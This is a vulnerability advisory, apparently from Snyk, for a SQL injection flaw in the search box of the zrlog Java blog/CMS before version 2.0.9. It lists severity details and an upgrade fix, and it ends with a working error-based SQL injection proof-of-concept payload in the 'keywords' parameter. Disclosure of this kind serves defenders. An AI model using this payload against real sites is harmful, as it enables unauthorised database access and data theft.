SQL Injection Affecting com.zrlog:zrlog Open this link in a new tab package, versions [,2.0.9)


0.0
medium
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Privileges Required

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-COMZRLOG-173757

  • published

    7 Mar 2019

  • disclosed

    7 Mar 2019

  • credit

    3lse

How to fix?

Upgrade com.zrlog:zrlog to version 2.0.9 or higher.

Overview

com.zrlog:zrlog is a blog/CMS program developed in Java.

Affected versions of this package are vulnerable to SQL Injection in the article management search box via the keywords parameter.

PoC

keywords=aaaa') AND (SELECT 8405 FROM(SELECT COUNT(*),CONCAT(0x71706a6271,(SELECT (ELT(8405=8405,1))),0x7176787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('VybC'='VybC&_search=false&nd=1537172851162&rows=10&page=1&sidx=&sord=asc